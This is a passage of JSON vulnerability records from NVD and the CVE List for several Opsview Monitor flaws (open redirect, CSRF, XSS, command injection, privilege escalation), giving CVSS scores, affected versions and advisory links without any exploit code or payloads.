"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-05-03T10:59:00.240",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2016-10368
Vulnerability from fkie_nvd - Published: 2017-05-03 10:59 - Updated: 2025-04-20 01:37

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "FD8E5B51-BCBA-45F0-80AC-F261799D85A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:4.6.4:*:*:*:pro:*:*:*",
"matchCriteriaId": "7EB123AC-31E7-4B3F-98E0-D1DD7F3B1ADE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.0.2:*:*:*:pro:*:*:*",
"matchCriteriaId": "7E2B55E2-5943-412D-ACBD-1D100234FF55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.1.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "A5E29CDA-78E1-418C-9548-F3294FF2DF1A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the /login URI."
},
{
"lang": "es",
"value": "Vulnerabilidad de redirecci\u00f3n abierta en Opsview Monitor Pro (anteriores a 5.1.0.162300841, 5.0.2.27475, 4.6.4.162391051 y 4.5.x sin un parche concreto de seguridad de 2016) permite a los atacantes remotos redirigir a los usuarios a sitios web arbitrarios y realizar el phishing a trav\u00e9s del par\u00e1metro back a la URI /login."
}
],
"id": "CVE-2016-10368",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-05-03T10:59:00.270",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-601"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2013-3935 (GCVE-0-2013-3935)
Vulnerability from cvelistv5 – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:22
- Cross-Site Request Forgery

| Vendor | Product | Version |
|---|---|---|
| Opsview | Opsview | Affected: before 4.4.1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:22:01.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Request Forgery ",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:52",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3935",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Request Forgery "
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3935",
"datePublished": "2020-01-02T14:31:52",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:22:01.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3936 (GCVE-0-2013-3936)
Vulnerability from cvelistv5 – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:30
- Cross-Site Scripting

| Vendor | Product | Version |
|---|---|---|
| Opsview | Opsview | Affected: before 4.4.1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:30:48.701Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:49",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3936",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3936",
"datePublished": "2020-01-02T14:31:49",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:30:48.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16145 (GCVE-0-2018-16145)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.184Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16145",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16145",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16147 (GCVE-0-2018-16147)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16147",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16146 (GCVE-0-2018-16146)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.835Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16146",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16146",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.835Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16144 (GCVE-0-2018-16144)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.656Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16144",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16144",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16148 (GCVE-0-2018-16148)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.353Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
